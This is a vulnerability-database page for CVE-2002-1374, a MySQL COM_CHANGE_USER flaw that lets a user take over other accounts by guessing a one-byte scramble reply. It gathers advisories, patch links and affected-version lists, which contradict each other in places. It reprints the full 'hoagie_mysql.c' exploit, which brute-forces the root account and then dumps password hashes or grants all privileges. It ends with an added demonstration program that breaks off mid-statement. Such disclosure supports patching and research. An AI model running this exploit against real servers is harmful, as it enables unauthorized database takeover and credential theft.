CVE-2002-1374
CVSS7.5
Published: 2002-12-23 00:00:00
Last modified: 2016-10-17 22:26:29

[Original text] The COM_CHANGE_USER command in MySQL 3.x before 3.23.54, and 4.x before 4.0.6, allows remote attackers to gain privileges via a brute force attack using a one-character password, which causes MySQL to only compare the provided password against the first character of the real password.


[CNNVD] MySQL COM_CHANGE_USER password authentication flaw vulnerability (CNNVD-200212-053)

        
        MySQL is an open-source relational database system.
        MySQL's password verification mechanism is flawed. A local or remote attacker can exploit this vulnerability to access the database under another database account. Because the database root account can be hijacked, the attacker may gain complete control of the database and, combined with other configuration problems on the system (for example a writable CGI directory, or MySQL itself running as root), may cause further damage to the operating system itself.
        This vulnerability is not newly discovered; it results from an incomplete fix of an old vulnerability. In February 2000, Robert van der Meulen found a flaw in MySQL's password verification (BUGTRAQ_ID: 975): when checking the hashed password, MySQL's challenge-response algorithm took the number of bytes to compare from the length of the response supplied by the client, so if the client sent a response of only one character, MySQL checked only one byte. Because each character of the hash produced by MySQL's hashing algorithm has only 32 possible values, at most 32 attempts are needed to give the server a correct response. When fixing this bug, the MySQL project simply added a check to the server code that accepts database login connections, requiring the hashed password to be 8 bytes long, but did not add the same check to the handling of the COM_CHANGE_USER command. An attacker holding a valid MySQL account can therefore still make repeated attempts at unauthorized access to the database. For a local user this means all databases can be controlled through the mysql root account.
        

- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:mysql:mysql:3.23.48  MySQL MySQL 3.23.48
cpe:/a:mysql:mysql:3.23.49  MySQL MySQL 3.23.49
cpe:/a:mysql:mysql:3.23.46  MySQL MySQL 3.23.46
cpe:/a:mysql:mysql:3.23.47  MySQL MySQL 3.23.47
cpe:/a:symantec_veritas:netbackup_advanced_reporter:4.5_mp3
cpe:/a:mysql:mysql:3.23.30  MySQL MySQL 3.23.30
cpe:/a:symantec_veritas:netbackup_advanced_reporter:4.5_mp2
cpe:/a:mysql:mysql:3.23.44  MySQL MySQL 3.23.44
cpe:/a:symantec_veritas:netbackup_advanced_reporter:4.5_mp1
cpe:/a:mysql:mysql:3.22.32  MySQL MySQL 3.22.32
cpe:/a:mysql:mysql:3.23.45  MySQL MySQL 3.23.45
cpe:/a:mysql:mysql:3.23.42  MySQL MySQL 3.23.42
cpe:/a:mysql:mysql:3.22.30  MySQL MySQL 3.22.30
cpe:/a:mysql:mysql:3.23.43  MySQL MySQL 3.23.43
cpe:/a:symantec_veritas:netbackup_advanced_reporter:3.4
cpe:/a:mysql:mysql:4.0.1  MySQL MySQL 4.0.1
cpe:/a:mysql:mysql:4.0.0  MySQL MySQL 4.0.0
cpe:/a:mysql:mysql:3.23.9  MySQL MySQL 3.23.9
cpe:/a:mysql:mysql:4.0.3  MySQL MySQL 4.0.3
cpe:/a:mysql:mysql:3.23.8  MySQL MySQL 3.23.8
cpe:/a:mysql:mysql:4.0.2  MySQL MySQL 4.0.2
cpe:/a:mysql:mysql:3.23.40  MySQL MySQL 3.23.40
cpe:/a:mysql:mysql:3.23.41  MySQL MySQL 3.23.41
cpe:/a:symantec_veritas:netbackup_global_data_manager:4.5_mp3
cpe:/a:mysql:mysql:3.23.3  MySQL MySQL 3.23.3
cpe:/a:mysql:mysql:3.23.2  MySQL MySQL 3.23.2
cpe:/a:mysql:mysql:3.23.5  MySQL MySQL 3.23.5
cpe:/a:mysql:mysql:3.23.53  MySQL MySQL 3.23.53
cpe:/a:mysql:mysql:3.23.10  MySQL MySQL 3.23.10
cpe:/a:mysql:mysql:3.23.4  MySQL MySQL 3.23.4
cpe:/a:symantec_veritas:netbackup_global_data_manager:4.5
cpe:/a:symantec_veritas:netbackup_global_data_manager:4.5_mp1
cpe:/a:symantec_veritas:netbackup_global_data_manager:4.5_mp2
cpe:/a:mysql:mysql:3.23.26  MySQL MySQL 3.23.26
cpe:/a:mysql:mysql:3.23.27  MySQL MySQL 3.23.27
cpe:/a:mysql:mysql:3.23.24  MySQL MySQL 3.23.24
cpe:/a:mysql:mysql:3.23.25  MySQL MySQL 3.23.25
cpe:/a:mysql:mysql:3.23.28  MySQL MySQL 3.23.28
cpe:/a:mysql:mysql:3.23.29  MySQL MySQL 3.23.29
cpe:/a:mysql:mysql:3.23.51  MySQL MySQL 3.23.51
cpe:/a:mysql:mysql:3.23.52  MySQL MySQL 3.23.52
cpe:/a:mysql:mysql:3.23.50  MySQL MySQL 3.23.50
cpe:/a:mysql:mysql:3.23.23  MySQL MySQL 3.23.23
cpe:/a:symantec_veritas:netbackup_advanced_reporter:4.5_fp3
cpe:/a:symantec_veritas:netbackup_advanced_reporter:4.5_fp2
cpe:/a:symantec_veritas:netbackup_advanced_reporter:4.5
cpe:/a:mysql:mysql:4.0.5a  MySQL MySQL 4.0.5a
cpe:/a:mysql:mysql:3.22.26  MySQL MySQL 3.22.26
cpe:/a:mysql:mysql:3.23.37  MySQL MySQL 3.23.37
cpe:/a:mysql:mysql:3.23.38  MySQL MySQL 3.23.38
cpe:/a:mysql:mysql:3.23.36  MySQL MySQL 3.23.36
cpe:/a:mysql:mysql:3.22.29  MySQL MySQL 3.22.29
cpe:/a:mysql:mysql:3.22.28  MySQL MySQL 3.22.28
cpe:/a:mysql:mysql:3.23.39  MySQL MySQL 3.23.39
cpe:/a:mysql:mysql:3.22.27  MySQL MySQL 3.22.27
cpe:/a:mysql:mysql:3.23.53a  MySQL MySQL 3.23.53a
cpe:/a:mysql:mysql:3.23.34  MySQL MySQL 3.23.34
cpe:/a:mysql:mysql:3.23.31  MySQL MySQL 3.23.31
cpe:/a:symantec_veritas:netbackup_global_data_manager:4.5_fp2
cpe:/a:symantec_veritas:netbackup_advanced_reporter:4.5_fp1
cpe:/a:symantec_veritas:netbackup_global_data_manager:4.5_fp3
cpe:/a:symantec_veritas:netbackup_global_data_manager:4.5_fp1

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1374
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1374
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-053
(official data source) CNNVD

- Other links and resources

http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000555
(UNKNOWN)  CONECTIVA  CLSA-2002:555
http://marc.info/?l=bugtraq&m=103971644013961&w=2
(UNKNOWN)  BUGTRAQ  20021212 Advisory 04/2002: Multiple MySQL vulnerabilities
http://marc.info/?l=bugtraq&m=104004857201968&w=2
(UNKNOWN)  GENTOO  GLSA-200212-2
http://marc.info/?l=bugtraq&m=104005886114500&w=2
(UNKNOWN)  BUGTRAQ  20021216 [OpenPKG-SA-2002.013] OpenPKG Security Advisory (mysql)
http://security.e-matters.de/advisories/042002.html
(UNKNOWN)  MISC  http://security.e-matters.de/advisories/042002.html
http://www.debian.org/security/2002/dsa-212
(UNKNOWN)  DEBIAN  DSA-212
http://www.linuxsecurity.com/advisories/engarde_advisory-2660.html
(VENDOR_ADVISORY)  ENGARDE  ESA-20021213-033
http://www.mandrakesoft.com/security/advisories?name=MDKSA-2002:087
(UNKNOWN)  MANDRAKE  MDKSA-2002:087
http://www.novell.com/linux/security/advisories/2003_003_mysql.html
(UNKNOWN)  SUSE  SUSE-SA:2003:003
http://www.redhat.com/support/errata/RHSA-2002-288.html
(UNKNOWN)  REDHAT  RHSA-2002:288
http://www.redhat.com/support/errata/RHSA-2002-289.html
(UNKNOWN)  REDHAT  RHSA-2002:289
http://www.redhat.com/support/errata/RHSA-2003-166.html
(UNKNOWN)  REDHAT  RHSA-2003:166
http://www.securityfocus.com/advisories/5269
(UNKNOWN)  IMMUNIX  IMNX-2003-7+-008-01
http://www.securityfocus.com/bid/6373
(VENDOR_ADVISORY)  BID  6373
http://www.trustix.net/errata/misc/2002/TSL-2002-0086-mysql.asc.txt
(UNKNOWN)  TRUSTIX  2002-0086
http://xforce.iss.net/xforce/xfdb/10847
(VENDOR_ADVISORY)  XF  mysql-comchangeuser-password-bypass(10847)

- Vulnerability information

MySQL COM_CHANGE_USER password authentication flaw vulnerability
High risk  Design error
2002-12-23 00:00:00 2006-03-28 00:00:00
Remote
        
        

- Advisories and patches

        Vendor patches:
        Conectiva
        ---------
        Conectiva has released a security advisory (CLA-2002:555) and corresponding patches for this issue:
        CLA-2002:555: MySQL
        Link:
        http://distro.conectiva.com/atualizacoes/?id=a&anuncio=000555

        Patch download:
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/MySQL-3.23.36-14U60_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/MySQL-bench-3.23.36-14U60_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/MySQL-client-3.23.36-14U60_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/MySQL-devel-3.23.36-14U60_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/MySQL-devel-static-3.23.36-14U60_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/MySQL-doc-3.23.36-14U60_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/MySQL-3.23.36-14U60_3cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/MySQL-3.23.36-14U70_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/MySQL-bench-3.23.36-14U70_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/MySQL-client-3.23.36-14U70_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/MySQL-devel-3.23.36-14U70_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/MySQL-devel-static-3.23.36-14U70_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/MySQL-doc-3.23.36-14U70_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/MySQL-3.23.36-14U70_3cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/MySQL-3.23.46-4U80_2cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/MySQL-bench-3.23.46-4U80_2cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/MySQL-client-3.23.46-4U80_2cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/MySQL-devel-3.23.46-4U80_2cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/MySQL-devel-static-3.23.46-4U80_2cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/MySQL-doc-3.23.46-4U80_2cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/SRPMS/MySQL-3.23.46-4U80_2cl.src.rpm
        Debian
        ------
        Debian has released a security advisory (DSA-212-1) and corresponding patches for this issue:
        DSA-212-1: Multiple MySQL vulnerabilities
        Link:
        http://www.debian.org/security/2002/dsa-212

        Patch download:
        Source archives:
        http://security.debian.org/pool/updates/main/m/mysql/mysql_3.22.32-6.3.dsc
        Size/MD5 checksum: 1305 26482e7b5f51fe036c9270043877483a
        http://security.debian.org/pool/updates/main/m/mysql/mysql_3.22.32.orig.tar.gz
        Size/MD5 checksum: 4296259 e3d9cb3038a2e4378c9c0f4f9d8c2d58
        http://security.debian.org/pool/updates/main/m/mysql/mysql_3.22.32-6.3.diff.gz
        Size/MD5 checksum: 84166 79faf5c0f1e6ab6c4c3b7511f9cc1e71
        Architecture independent packages:
        http://security.debian.org/pool/updates/main/m/mysql/mysql-doc_3.22.32-6.3_all.deb
        Size/MD5 checksum: 1687018 e3d348a98e08bbff4085215356c5dcc7
        alpha architecture (DEC Alpha)
        http://security.debian.org/pool/updates/main/m/mysql/mysql-server_3.22.32-6.3_alpha.deb
        Size/MD5 checksum: 790098 2d103be33a041fa8af05a6d1a8fae1fc
        http://security.debian.org/pool/updates/main/m/mysql/mysql-client_3.22.32-6.3_alpha.deb
        Size/MD5 checksum: 99516 c3803f9e8e090bc9755cc8502f7dd860
        arm architecture (ARM)
        http://security.debian.org/pool/updates/main/m/mysql/mysql-server_3.22.32-6.3_arm.deb
        Size/MD5 checksum: 603710 028266a7c4c99365a8fe715fda7635b9
        http://security.debian.org/pool/updates/main/m/mysql/mysql-client_3.22.32-6.3_arm.deb
        Size/MD5 checksum: 87190 0f6e1c53dd71bd45ec0bfc7bdd3e92c3
        i386 architecture (Intel ia32)
        http://security.debian.org/pool/updates/main/m/mysql/mysql-server_3.22.32-6.3_i386.deb
        Size/MD5 checksum: 585150 54c0e5b9aa43a2d4fd2137f22851243a
        http://security.debian.org/pool/updates/main/m/mysql/mysql-client_3.22.32-6.3_i386.deb
        Size/MD5 checksum: 86768 fe2974d4fc341c7fc5c3866636a49676
        m68k architecture (Motorola Mc680x0)
        http://security.debian.org/pool/updates/main/m/mysql/mysql-server_3.22.32-6.3_m68k.deb
        Size/MD5 checksum: 554888 5d636134e003bdd33f6dd74e60ca6570
        http://security.debian.org/pool/updates/main/m/mysql/mysql-client_3.22.32-6.3_m68k.deb
        Size/MD5 checksum: 84534 47f6aa149c3b872722b5357bb962c0a7
        powerpc architecture (PowerPC)
        

- Vulnerability information (22084)

MySQL 3.23.x/4.0.x COM_CHANGE_USER Password Length Account Compromise Vulnerability (EDBID:22084)
unix remote
2002-12-16 Verified
0 andi
N/A
source: http://www.securityfocus.com/bid/6373/info

A flaw in the password authentication mechanism for MySQL may make it possible for an authenticated database user to compromise the accounts of other database users. 

The flaw lies in the fact that the server uses a string returned by the client when the COM_CHANGE_USER command is issued to iterate through a comparison when attempting to authenticate the password. An attacker may authenticate as another database user if they can successfully guess the first character of the correct password for that user. The range of the valid character set for passwords is 32 characters, which means that a malicious user can authenticate after a maximum of 32 attempts if they cycle through all of the valid characters.

/***********************************************************
 * hoagie_mysql.c
 *
 * local and remote exploit for mysql <= 3.23.53a 
 *
 * new years present .... works also for 3.23.54 openbsd
 *                        (head) date 16/12/2002
 *
 * hey after some code checking and patching my mysql server
 * i realized that this patch doesn't protect you against 
 * this vulnerability.
 * The length of the scramble string is important for the
 * password check and not the length of the password.
 *
 * perhaps other systems are also still vulnerable
 *
 * gcc hoagie_mysql.c -o hoagie_mysql -lmysqlclient -I/usr/local/include -L/usr/local/lib/mysql
 *
 * Author: Andi <andi@void.at>
 *
 * Greetz to Greuff, philipp and the other hoagie-fellas :-)
 *
 * With this exploit you can also do those nasty things:
 *   http://void.at/andi/mysql.pdf
 *
 * $ ./hoagie_mysql -u dbuser -p dbpass
 * connecting to [localhost] as [dbpass] ... ok
 * sending one byte requests with user [root] ...
 *           root 13fb921913f4b3b1 
 *           root                  
 *           ...........
 *           ........
 * $
 *
 * If root or the attack user has no password set, this
 * exploit will fail -> thx to philipp
 *
 * THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-
 * CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY 
 * DAMAGE DONE USING THIS PROGRAM.
 *
 ************************************************************/
#include <stdio.h>
#include <stdlib.h>     /* exit() */
#include <string.h>     /* strcmp() */
#include <unistd.h>     /* getopt() */
#include <mysql/mysql.h>

/* scramble(), simple_command(), COM_CHANGE_USER and MYSQL::scramble_buff are
 * the 3.23-era libmysqlclient internals the original author built against. */
int do_attack(MYSQL *mysql, char *attackuser);
void do_action(MYSQL *mysql, char *action, char *user);
char *strmov(register char *dst, register const char *src);

int main(int argc, char **argv) {
   MYSQL mysql;
   int optchar;   /* getopt() returns int; a plain char cannot reliably hold EOF */
   char *target, *user, *password, *attackuser, *action;

   target = user = password = action = attackuser = NULL;

   while ( (optchar = getopt(argc, argv, "ht:u:p:a:e:")) != EOF ) {
       switch(optchar) { 
           case 'h': printf("hoagie_mysql.c\n");
                     printf("-t ... mysql server (default localhost)\n");
                     printf("-u ... username (default empty)\n");
                     printf("-p ... password (default empty)\n");
                     printf("-a ... attack user (default root)\n");
                     printf("-e ... action\n");
                     printf("-h ... this screen\n");
                     exit(0);
           case 't': target = optarg;
                     break;
           case 'u': user = optarg;
                     break;
           case 'p': password = optarg;
                     break;
           case 'a': attackuser = optarg;
                     break;
           case 'e': action = optarg;
                     break;
       }
   }

   if (!target) target = "localhost";
   if (!user) user = "";
   if (!password) password = "";
   if (!attackuser) attackuser = "root";
   if (!action) action = "dumpuser";

   printf("connecting to [%s] as [%s] ... ", target, user);
   fflush(stdout);   /* flush the prompt; fflush(stdin) is undefined behaviour */

   if (!mysql_connect(&mysql, target, user, password)) {
       printf("failed\n");
       return 0;
   } else {
       printf("ok\n");
   }

   printf("sending one byte requests with user [%s] ... \n", attackuser);
   if (!do_attack(&mysql, attackuser)) {
       do_action(&mysql, action, user);
   } else {
       printf("attack failed\n");
   }
   mysql_close(&mysql);

   return 0;
}

int do_attack(MYSQL *mysql, char *attackuser) {
   char buff[512], *pos=buff, *attackpasswd = "A";
   int len, j, ret = 1;

   /* COM_CHANGE_USER payload: user name, NUL, scrambled password, NUL, db name. */
   pos = (char*)strmov(pos,attackuser)+1;
   /* Truncate the server challenge to one byte so scramble() emits a one-byte
    * reply; the vulnerable server then compares only that one byte. */
   mysql->scramble_buff[1] = 0;
   pos = scramble(pos, mysql->scramble_buff, attackpasswd,
               (my_bool) (mysql->protocol_version == 9));
   pos = (char*)strmov(pos+1,"");
   len = pos-buff;

   /* Offset 5 is the scramble byte only for a 4-character user name ("root")
    * followed by its NUL; the 32 candidate values are 'A' + 0..31. */
   for (j = 0; ret && j < 32; j++) {
       buff[5] = 65 + j; 
       ret = simple_command(mysql,COM_CHANGE_USER, buff,(uint)len,0);
   }

   return ret;   /* 0 once the server accepted a COM_CHANGE_USER */
}

void do_action(MYSQL *mysql, char *action, char *user) {
   MYSQL_ROW row;
   MYSQL_RES *result;
   char buf[512];

   mysql_select_db(mysql, "mysql");

   if (!strcmp(action, "dumpuser")) {
      mysql_query(mysql, "select user, password, host from user");
      result = mysql_use_result(mysql);
      if (!result)          /* query failed: nothing to iterate */
          return;

      while ((row = mysql_fetch_row(result)))
          printf("%16s %16s %50s\n", row[0], row[1], row[2]);
      mysql_free_result(result);
   } else if (!strcmp(action, "becomeadmin")) {
      snprintf(buf, sizeof(buf) - 1,
               "update user set Select_priv='Y', Insert_priv='Y', Update_priv='Y', Delete_priv='Y', "
               " Create_priv='Y', Drop_priv='Y', Reload_priv='Y', Shutdown_priv='Y', Process_priv='Y', "
               " File_priv='Y', Grant_priv='Y', References_priv='Y', Index_priv='Y', Alter_priv='Y' where "
               " user = '%s'", user);       
      mysql_query(mysql, buf);
      mysql_reload(mysql);
   } /* do whatever you want ... see mysql api ... // else if ( */
}

/* Copy src to dst and return a pointer to the terminating NUL (MySQL's strmov). */
char *strmov(register char *dst, register const char *src)
{
   while ((*dst++ = *src++)) ;
   return dst-1;
}

- Vulnerability information

8887
MySQL COM_CHANGE_USER Command One Character Password Brute Force
Remote / Network Access Authentication Management
Loss of Confidentiality
Exploit Unknown

- Vulnerability description

MySQL 4.0.5a contains a flaw in the COM_CHANGE_USER function that may lead to an unauthorized password exposure. It is possible to gain access to another user's credentials, such as root, by brute-force guessing only the first character of the target's password.

- Timeline

2002-12-12 Unknown
Unknown Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, MySQL AB has released a patch to address this vulnerability.

- References

- Vulnerability author

- Vulnerability information

MySQL COM_CHANGE_USER Password Length Account Compromise Vulnerability
Design Error 6373
Yes No
2002-12-12 12:00:00 2009-07-11 07:16:00
Discovery of this issue is credited to Stefan Esser <s.esser@e-matters.de>.

- Affected program versions

Veritas Software NetBackup Global Data Manager 4.5 MP3
Veritas Software NetBackup Global Data Manager 4.5 MP2
Veritas Software NetBackup Global Data Manager 4.5 MP1
Veritas Software NetBackup Global Data Manager 4.5 FP3
Veritas Software NetBackup Global Data Manager 4.5 FP2
Veritas Software NetBackup Global Data Manager 4.5 FP1
Veritas Software NetBackup Global Data Manager 4.5
Veritas Software NetBackup Advanced Reporter 4.5 MP3
Veritas Software NetBackup Advanced Reporter 4.5 MP2
Veritas Software NetBackup Advanced Reporter 4.5 MP1
Veritas Software NetBackup Advanced Reporter 4.5 FP3
Veritas Software NetBackup Advanced Reporter 4.5 FP2
Veritas Software NetBackup Advanced Reporter 4.5 FP1
Veritas Software NetBackup Advanced Reporter 4.5
Veritas Software NetBackup Advanced Reporter 3.4
MySQL AB MySQL 4.0.5 a
MySQL AB MySQL 4.0.3
MySQL AB MySQL 4.0.2
MySQL AB MySQL 4.0.1
MySQL AB MySQL 4.0 .0
MySQL AB MySQL 3.23.53 a
MySQL AB MySQL 3.23.53
+ OpenPKG OpenPKG Current
+ Sun Cobalt Qube 3
MySQL AB MySQL 3.23.52
+ Conectiva Linux Enterprise Edition 1.0
+ Mandriva Linux Mandrake 9.0
+ OpenPKG OpenPKG 1.1
+ RedHat Linux 8.0 i386
+ RedHat Linux 8.0
+ S.u.S.E. Linux 8.1
+ Trustix Secure Linux 1.5
MySQL AB MySQL 3.23.51
MySQL AB MySQL 3.23.50
MySQL AB MySQL 3.23.49
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ RedHat Linux 7.3 i686
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.3
MySQL AB MySQL 3.23.48
+ S.u.S.E. Linux 8.0 i386
+ S.u.S.E. Linux 8.0
MySQL AB MySQL 3.23.47
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
MySQL AB MySQL 3.23.46
+ Conectiva Linux 8.0
+ OpenPKG OpenPKG 1.0
MySQL AB MySQL 3.23.45
MySQL AB MySQL 3.23.44
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux 7.3
MySQL AB MySQL 3.23.43
MySQL AB MySQL 3.23.42
MySQL AB MySQL 3.23.41
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 alpha
+ RedHat Linux 7.2
MySQL AB MySQL 3.23.40
MySQL AB MySQL 3.23.39
+ HP SCM 3.0
MySQL AB MySQL 3.23.38
MySQL AB MySQL 3.23.37
+ S.u.S.E. Linux 7.2 i386
+ S.u.S.E. Linux 7.2
MySQL AB MySQL 3.23.36
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ EnGarde Secure Linux 1.0.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i686
+ RedHat Linux 7.1 i586
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1
MySQL AB MySQL 3.23.34
- Debian Linux 2.2 sparc
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 arm
- Debian Linux 2.2 alpha
- Debian Linux 2.2 68k
- Debian Linux 2.2
- FreeBSD FreeBSD 4.2
- FreeBSD FreeBSD 3.5.1
- HP HP-UX 11.11
- HP HP-UX 11.0
- IBM AIX 4.3.3
- IBM AIX 4.3.2
- Mandriva Linux Mandrake 7.2
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- OpenBSD OpenBSD 2.8
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- RedHat Linux 7.0 i386
- RedHat Linux 7.0 alpha
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 alpha
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 6.4
- Sun Solaris 8_x86
- Sun Solaris 8_sparc
- Sun Solaris 7.0_x86
- Sun Solaris 7.0
- Sun Solaris 2.6_x86
- Sun Solaris 2.6
MySQL AB MySQL 3.23.33
+ S.u.S.E. Linux 7.1 x86
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1
MySQL AB MySQL 3.23.32
+ Wirex Immunix OS 7+
MySQL AB MySQL 3.23.31
+ MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 7.2
MySQL AB MySQL 3.23.30
MySQL AB MySQL 3.23.29
MySQL AB MySQL 3.23.28
MySQL AB MySQL 3.23.27
MySQL AB MySQL 3.23.26
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.1
MySQL AB MySQL 3.23.25
MySQL AB MySQL 3.23.24
MySQL AB MySQL 3.23.23
MySQL AB MySQL 3.23.22
+ RedHat Linux 7.0 sparc
+ RedHat Linux 7.0 alpha
+ RedHat Linux 7.0
MySQL AB MySQL 3.23.10
MySQL AB MySQL 3.23.9
MySQL AB MySQL 3.23.8
MySQL AB MySQL 3.23.5
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ Trustix Secure Linux 1.5
MySQL AB MySQL 3.23.4
MySQL AB MySQL 3.23.3
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
MySQL AB MySQL 3.22.32
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 IA-32
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
MySQL AB MySQL 3.22.30
MySQL AB MySQL 3.22.29
MySQL AB MySQL 3.22.28
MySQL AB MySQL 3.22.27
MySQL AB MySQL 3.22.26
Miva htmlscript 3.23.32
Veritas Software NetBackup Global Data Manager 4.5 MP4
Veritas Software NetBackup Global Data Manager 4.5 FP4
Veritas Software NetBackup Advanced Reporter 4.5 MP4
Veritas Software NetBackup Advanced Reporter 4.5 FP4
MySQL AB MySQL 3.23.54
+ Sun Cobalt RaQ 550
+ Trustix Secure Linux 1.5

- Unaffected program versions

Veritas Software NetBackup Global Data Manager 4.5 MP4
Veritas Software NetBackup Global Data Manager 4.5 FP4
Veritas Software NetBackup Advanced Reporter 4.5 MP4
Veritas Software NetBackup Advanced Reporter 4.5 FP4
MySQL AB MySQL 3.23.54
+ Sun Cobalt RaQ 550
+ Trustix Secure Linux 1.5

- Vulnerability discussion

A flaw in the password authentication mechanism for MySQL may make it possible for an authenticated database user to compromise the accounts of other database users.

The flaw lies in the fact that the server uses a string returned by the client when the COM_CHANGE_USER command is issued to iterate through a comparison when attempting to authenticate the password. An attacker may authenticate as another database user if they can successfully guess the first character of the correct password for that user. The range of the valid character set for passwords is 32 characters, which means that a malicious user can authenticate after a maximum of 32 attempts if they cycle through all of the valid characters.

This issue is related to the vulnerability described in Bugtraq ID 975. The problem was not sufficiently addressed in the COM_CHANGE_USER command.
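The defect described in the CNNVD description and in the discussion above is a comparison whose length is taken from the client. The following is an added example, not MySQL source code and not the exploit listed on this page: a toy model of the 3.23-era scrambled-password check in its vulnerable form beside the hardened form a server must use. Assumptions: a full reply is 8 bytes (the length the page says the login-path fix requires), each reply byte takes one of 32 values (modelled as 'A'..'A'+31, the range the listed exploit cycles through with 65+j), and the expected reply is a constructed literal standing in for the value the server derives from the stored hash and its challenge.

```c
/* Added example: toy model of the COM_CHANGE_USER scramble check.
 * Not MySQL source code; the lengths, alphabet and EXPECTED value are
 * modelling assumptions taken from the page's description. */
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define SCRAMBLE_LENGTH   8    /* full reply length the fix requires */
#define SCRAMBLE_ALPHABET 32   /* possible values per reply byte */

/* Vulnerable pattern: the loop bound is the length of what the CLIENT sent,
 * so a one-byte reply is accepted whenever that single byte matches. */
bool check_scramble_vulnerable(const char *reply, const char *expected)
{
    size_t n = strlen(reply);              /* attacker-controlled bound */
    for (size_t i = 0; i < n; i++) {
        if (reply[i] != expected[i])
            return false;
    }
    return true;
}

/* Hardened pattern: the server fixes the length itself and compares every
 * byte without an early exit, so neither the length nor the timing of the
 * comparison depends on how much of the reply happens to be right. */
bool check_scramble_fixed(const char *reply, const char *expected)
{
    if (strlen(reply) != SCRAMBLE_LENGTH)
        return false;
    unsigned char diff = 0;
    for (size_t i = 0; i < SCRAMBLE_LENGTH; i++)
        diff |= (unsigned char)(reply[i] ^ expected[i]);
    return diff == 0;
}

/* Count how many of the 32 possible one-byte replies a check accepts.
 * This is the figure behind the page's "at most 32 attempts": the
 * vulnerable check accepts exactly one of them, the hardened check none. */
int accepted_one_byte_replies(bool (*check)(const char *, const char *),
                              const char *expected)
{
    int accepted = 0;
    char reply[2] = { 0, 0 };
    for (int j = 0; j < SCRAMBLE_ALPHABET; j++) {
        reply[0] = (char)('A' + j);
        if (check(reply, expected))
            accepted++;
    }
    return accepted;
}

/* Constructed 8-byte expected reply drawn from the modelled alphabet. */
static const char *EXPECTED = "CAFEBABE";

int main(void)
{
    printf("vulnerable check accepts %d of %d one-byte replies\n",
           accepted_one_byte_replies(check_scramble_vulnerable, EXPECTED),
           SCRAMBLE_ALPHABET);
    printf("hardened   check accepts %d of %d one-byte replies\n",
           accepted_one_byte_replies(check_scramble_fixed, EXPECTED),
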